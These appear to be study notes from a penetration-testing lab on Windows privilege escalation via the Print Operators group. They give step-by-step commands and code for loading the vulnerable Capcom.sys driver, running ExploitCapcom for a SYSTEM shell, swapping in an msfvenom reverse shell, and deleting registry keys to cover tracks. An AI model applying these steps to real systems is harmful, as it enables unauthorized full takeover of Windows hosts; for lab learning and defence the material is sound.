14 - Print Operators Group

# Intro - [Print Operators](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#print-operators) is another highly privileged group, which grants its members the `SeLoadDriverPrivilege`, rights to manage, create, share, and delete printers connected to a DC, as well as the ability to log on locally to a DC and shut it down - NOTE: Since Windows 10 Version 1803, the `SeLoadDriverPrivilege` is not exploitable, as it is no longer possible to include references to registry keys under `HKEY_CURRENT_USER` # Confirm Membership and Privilege ```powershell whoami /groups #shows memberships for current user whoami /priv #shows privs for current user ``` - If we see group membership from `whomai /groups` but don't see the `SeLoadDriverPrivilege` from `whaomi /priv`, we will need to by pass UAC - The [UACMe](https://github.com/hfiref0x/UACME) repo features a comprehensive list of UAC bypasses, which can be used from the command line - Alternatively, from a GUI, we can open an administrative command shell and input the credentials of the account that is a member of the Print Operators group - If we examine the privileges again, `SeLoadDriverPrivilege` is visible but disabled # `capcom.sys` driver - It's well known that the driver `Capcom.sys` contains functionality to allow any user to execute shellcode with SYSTEM privs - We can use the `SeLoadDriverPrivilege` to load this vulnerable driver and privesc ## Loading the driver - First, download the `Capcom.sys` driver from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys), and save it to `C:\temp`. - We can use [this](https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp) tool to load the driver - NOTE: The PoC enables the privilege as well as loads the driver for us - Download it locally and edit it, pasting over the includes below ```c #include <windows.h> #include <assert.h> #include <winternl.h> #include <sddl.h> #include <stdio.h> #include "tchar.h" ``` - Next, from a Visual Studio 2019 Developer Command Prompt, compile the PoC using `cl.exe` ```cmd cl.exe /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp ``` - Then, Issue the commands below to add a reference to `capcom.sys` driver under our HKEY_CURRENT_USER tree - Note: The syntax `\??\` below is used to reference our malicious driver's ImagePath is an [NT Object Path](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/c1550f98-a1ce-426a-9991-7509e7c3787c), where the Win32 API will parse and resolve this path to properly locate and load our malicious driver ```cmd reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 ``` - Next, with Nirsoft's [DriverView.exe](http://www.nirsoft.net/utils/driverview.html), we can verify that the Capcom.sys driver is not loaded ```powershell .\DriverView.exe /stext drivers.txt cat drivers.txt | Select-String -pattern Capcom ``` - Then, run the `EnableSeLoadDriverPrivilege.exe` binary that we compiled above ```cmd EnableSeLoadDriverPrivilege.exe ``` - Now, verify that the `capcom.sys` driver is now listed with `DriverView.exe` ```powershell PS C:\htb> .\DriverView.exe /stext drivers.txt PS C:\htb> cat drivers.txt | Select-String -pattern Capcom ``` ## Exploiting the loaded driver - To exploit the `capcom.sys` driver, we can use the [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) tool after compiling with it Visual Studio ```powershell .\ExploitCapcom.exe ``` - This will launch a shell with SYSTEM privs ## Alternative exploitation w/o GUI - If we do not have GUI access to the target, we will have to modify the `ExploitCapcom.cpp` code before compiling - Here we can edit line 292 and replace `"C:\\Windows\\system32\\cmd.exe"` with, say, a reverse shell binary created with `msfvenom`, for example: `c:\ProgramData\revshell.exe` ```c // Default code that launches a command shell process static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo = { sizeof(StartupInfo) }; if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo, &ProcessInfo)) { return false; } CloseHandle(ProcessInfo.hThread); CloseHandle(ProcessInfo.hProcess); return true; } ``` ```c //Replacement line TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe"); ``` - We would set up a listener based on the `msfvenom` payload we generated and hopefully receive a reverse shell connection back when executing `ExploitCapcom.exe` - If a revshell connection is blocked for some reason, we can try a bind shell or exec/add user payload ## Automating the above steps - Use [EoPLoadDriver](https://github.com/TarlogicSecurity/EoPLoadDriver/) to automate the process of enabling the privilege, creating the registry key, and executing `NTLoadDriver` to load the driver ```cmd EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys ``` - Then, run `ExploitCapcom.exe` to pop a SYSTEM shell or run our custom binary ## Cleanup - Cover our tacks by deleting the registry key we added ```cmd reg delete HKCU\System\CurrentControlSet\Capcom ``` --- # Exercise ## Initial Enum - `ping` test ![[images/Pasted image 20260220192618.png]] - `nmap` scan ![[images/Pasted image 20260220192658.png]] - `rdp` into target with given creds - light internal enum ![[images/Pasted image 20260220193300.png]] ![[images/Pasted image 20260220192857.png]] - We are in the `print operators` group but we do not see the `SeLoadDriver` priv - open an elevated shell ![[images/Pasted image 20260220193005.png]] - Now we see that the `SeLoadDriver` priv is disabled - see what tools we have access to ![[images/Pasted image 20260220193113.png]] ## Example using `EnableSeLoadDriverPrivilege.exe` - First, add registry key references to `\tools\capcom.sys` under our HKEY_CURRENT_USER tree ![[images/Pasted image 20260220193509.png]] - Now, verify driver is not loaded with `DriverView.exe` - No results from `Selectr-String` powershell cmdlet ![[images/Pasted image 20260220193625.png]] - Run `EnableSeLoadDriverPrivilege.exe` - The `SeLoadDriver` priv is now enabled ![[images/Pasted image 20260220193709.png]] - Now, verify driver is indeed loaded with `DriverView.exe` ![[images/Pasted image 20260220193756.png]] - Run `ExploitCapcom.exe` ![[images/Pasted image 20260220193922.png]] ## Example using `EopLoadDriver` - Driver loaded and `SeLoadDriver` priv enabled ![[images/Pasted image 20260220194352.png]] - Now we would just need to run `ExploitCapcom.exe`